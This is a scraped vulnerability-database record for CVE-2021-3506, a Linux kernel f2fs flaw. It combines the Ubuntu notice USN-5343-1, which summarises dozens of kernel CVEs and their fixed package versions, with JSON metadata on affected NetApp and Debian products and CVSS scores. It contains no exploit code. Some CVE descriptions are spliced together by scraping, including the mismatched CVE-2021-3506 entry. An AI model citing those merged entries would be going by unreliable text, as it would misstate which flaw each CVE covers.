It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device detach events, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3573)

Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)

It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679)

It was discovered that the Virtio console implementation in the Linux kernel did not properly validate input lengths in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-38160)

It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly compute the access permissions for shadow pages in some situations. A local attacker could use this to cause a denial of service. (CVE-2021-38198)

It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204)

It was discovered that the NFC implementation in the Linux kernel did not properly handle failed connect events leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2021-38208)

It was discovered that the configfs interface for USB gadgets in the Linux kernel contained a race condition. (CVE-2021-39648)

It was discovered that the ext4 file system in the Linux kernel contained a race condition when writing xattrs to an inode. A local attacker could use this to cause a denial of service or possibly gain administrative privileges. (CVE-2021-40490)

It was discovered that the 6pack network protocol driver in the Linux kernel did not properly perform validation checks. A privileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-42008)

It was discovered that the ISDN CAPI implementation in the Linux kernel contained a race condition in certain situations that could trigger an array out-of-bounds bug. A privileged local attacker could possibly use this to cause a denial of service or execute arbitrary code. (CVE-2021-43389)

It was discovered that the Phone Network protocol (PhoNet) implementation in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45095)

Wenqing Liu discovered that the f2fs file system in the Linux kernel did not properly validate the last xattr entry in an inode. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-45469)

Amit Klein discovered that the IPv6 implementation in the Linux kernel could disclose internal state in some situations. An attacker could possibly use this to expose sensitive information. (CVE-2021-45485)

It was discovered that the per cpu memory allocator in the Linux kernel could report kernel pointers via dmesg. An attacker could use this to expose sensitive information or in conjunction with another kernel vulnerability. (CVE-2018-5995)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 ESM: linux-image-4.4.0-1103-kvm 4.4.0-1103.112 linux-image-4.4.0-1138-aws 4.4.0-1138.152 linux-image-4.4.0-222-generic 4.4.0-222.255 linux-image-4.4.0-222-lowlatency 4.4.0-222.255 linux-image-aws 4.4.0.1138.143 linux-image-generic 4.4.0.222.229 linux-image-kvm 4.4.0.1103.101 linux-image-lowlatency 4.4.0.222.229 linux-image-virtual 4.4.0.222.229

Ubuntu 14.04 ESM: linux-image-4.4.0-1102-aws 4.4.0-1102.107 linux-image-4.4.0-222-generic 4.4.0-222.255~14.04.1 linux-image-4.4.0-222-lowlatency 4.4.0-222.255~14.04.1 linux-image-aws 4.4.0.1102.100 linux-image-generic-lts-xenial 4.4.0.222.193 linux-image-lowlatency-lts-xenial 4.4.0.222.193 linux-image-virtual-lts-xenial 4.4.0.222.193

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-5343-1 CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449, CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555, CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129, CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688, CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033, CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483, CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612, CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204, CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008, CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485, CVE-2022-0492

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202104-1670",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2021-3506",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 7.8,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-391284",
            "impactScore": 7.8,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-3506",
            "impactScore": 7.8,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.2,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-3506",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-1357",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-391284",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-3506",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. The vulnerability stems from a boundary check failure. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04. ==========================================================================\nUbuntu Security Notice USN-5343-1\nMarch 22, 2022\n\nlinux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty\n\nDetails:\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. A local attacker could use this to gain\nadministrative privileges. (CVE-2022-0492)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly restrict mount namespaces, when mounted with the non-default\nallow_userns option set. A local attacker could use this to gain\nadministrative privileges. (CVE-2016-2853)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly maintain POSIX ACL xattr data, when mounted with the non-default\nallow_userns option. A local attacker could possibly use this to gain\nelevated privileges. (CVE-2016-2854)\n\nIt was discovered that the f2fs file system in the Linux kernel did not\nproperly validate metadata in some situations. An attacker could use this\nto construct a malicious f2fs image that, when mounted and operated on,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-19449)\n\nIt was discovered that the XFS file system implementation in the Linux\nkernel did not properly validate meta data in some circumstances. An\nattacker could use this to construct a malicious XFS image that, when\nmounted, could cause a denial of service. (CVE-2020-12655)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel contained a reference counting error. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25670)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly deallocate memory in certain error\nsituations. A local attacker could use this to cause a denial of service\n(memory exhaustion). (CVE-2020-25671, CVE-2020-25672)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly handle error conditions in some situations,\nleading to an infinite loop. A local attacker could use this to cause a\ndenial of service. (CVE-2020-25673)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. (CVE-2020-26147)\n\nIt was discovered that the BR/EDR pin-code pairing procedure in the Linux\nkernel was vulnerable to an impersonation attack. A physically proximate\nattacker could possibly use this to pair to a device without knowledge of\nthe pin-code. An authenticated attacker could possibly\nuse this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)\n\nIt was discovered that the FUSE user space file system implementation in\nthe Linux kernel did not properly handle bad inodes in some situations. A\nlocal attacker could possibly use this to cause a denial of service. \n(CVE-2020-36322)\n\nIt was discovered that the Infiniband RDMA userspace connection manager\nimplementation in the Linux kernel contained a race condition leading to a\nuse-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possible execute arbitrary code. \n(CVE-2020-36385)\n\nIt was discovered that the DRM subsystem in the Linux kernel contained\ndouble-free vulnerabilities. A privileged attacker could possibly use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-20292)\n\nIt was discovered that a race condition existed in the timer implementation\nin the Linux kernel. A privileged attacker could use this to cause a denial\nof service. (CVE-2021-20317)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nIt was discovered that the Xen paravirtualization backend in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2021-28688)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that a race condition existed in the netfilter subsystem\nof the Linux kernel when replacing tables. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nIt was discovered that a race condition in the kernel Bluetooth subsystem\ncould lead to use-after-free of slab objects. An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that the CIPSO implementation in the Linux kernel did not\nproperly perform reference counting in some situations, leading to use-\nafter-free vulnerabilities. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33033)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nAsaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the\nLinux kernel did not properly validate large MTU requests from Virtual\nFunction (VF) devices. A local attacker could possibly use this to cause a\ndenial of service. (CVE-2021-33098)\n\nNorbert Slusarek discovered that the CAN broadcast manger (bcm) protocol\nimplementation in the Linux kernel did not properly initialize memory in\nsome situations. (CVE-2021-34693)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in\nthe Linux kernel did not properly perform reference counting in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device initialization failure, leading to a double-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3564)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device detach events, leading to a use-after-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3573)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. (CVE-2021-3612)\n\nIt was discovered that the tracing subsystem in the Linux kernel did not\nproperly keep track of per-cpu ring buffer state. A privileged attacker\ncould use this to cause a denial of service. (CVE-2021-3679)\n\nIt was discovered that the Virtio console implementation in the Linux\nkernel did not properly validate input lengths in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2021-38160)\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly compute the access permissions for shadow pages in\nsome situations. A local attacker could use this to cause a denial of\nservice. (CVE-2021-38198)\n\nIt was discovered that the MAX-3421 host USB device driver in the Linux\nkernel did not properly handle device removal events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2021-38204)\n\nIt was discovered that the NFC implementation in the Linux kernel did not\nproperly handle failed connect events leading to a NULL pointer\ndereference. A local attacker could use this to cause a denial of service. \n(CVE-2021-38208)\n\nIt was discovered that the configfs interface for USB gadgets in the Linux\nkernel contained a race condition. (CVE-2021-39648)\n\nIt was discovered that the ext4 file system in the Linux kernel contained a\nrace condition when writing xattrs to an inode. A local attacker could use\nthis to cause a denial of service or possibly gain administrative\nprivileges. (CVE-2021-40490)\n\nIt was discovered that the 6pack network protocol driver in the Linux\nkernel did not properly perform validation checks. A privileged attacker\ncould use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2021-42008)\n\nIt was discovered that the ISDN CAPI implementation in the Linux kernel\ncontained a race condition in certain situations that could trigger an\narray out-of-bounds bug. A privileged local attacker could possibly use\nthis to cause a denial of service or execute arbitrary code. \n(CVE-2021-43389)\n\nIt was discovered that the Phone Network protocol (PhoNet) implementation\nin the Linux kernel did not properly perform reference counting in some\nerror conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45095)\n\nWenqing Liu discovered that the f2fs file system in the Linux kernel did\nnot properly validate the last xattr entry in an inode. An attacker could\nuse this to construct a malicious f2fs image that, when mounted and\noperated on, could cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-45469)\n\nAmit Klein discovered that the IPv6 implementation in the Linux kernel\ncould disclose internal state in some situations. An attacker could\npossibly use this to expose sensitive information. (CVE-2021-45485)\n\nIt was discovered that the per cpu memory allocator in the Linux kernel\ncould report kernel pointers via dmesg. An attacker could use this to\nexpose sensitive information or in conjunction with another kernel\nvulnerability. (CVE-2018-5995)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n  linux-image-4.4.0-1103-kvm      4.4.0-1103.112\n  linux-image-4.4.0-1138-aws      4.4.0-1138.152\n  linux-image-4.4.0-222-generic   4.4.0-222.255\n  linux-image-4.4.0-222-lowlatency  4.4.0-222.255\n  linux-image-aws                 4.4.0.1138.143\n  linux-image-generic             4.4.0.222.229\n  linux-image-kvm                 4.4.0.1103.101\n  linux-image-lowlatency          4.4.0.222.229\n  linux-image-virtual             4.4.0.222.229\n\nUbuntu 14.04 ESM:\n  linux-image-4.4.0-1102-aws      4.4.0-1102.107\n  linux-image-4.4.0-222-generic   4.4.0-222.255~14.04.1\n  linux-image-4.4.0-222-lowlatency  4.4.0-222.255~14.04.1\n  linux-image-aws                 4.4.0.1102.100\n  linux-image-generic-lts-xenial  4.4.0.222.193\n  linux-image-lowlatency-lts-xenial  4.4.0.222.193\n  linux-image-virtual-lts-xenial  4.4.0.222.193\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-5343-1\n  CVE-2016-2853, 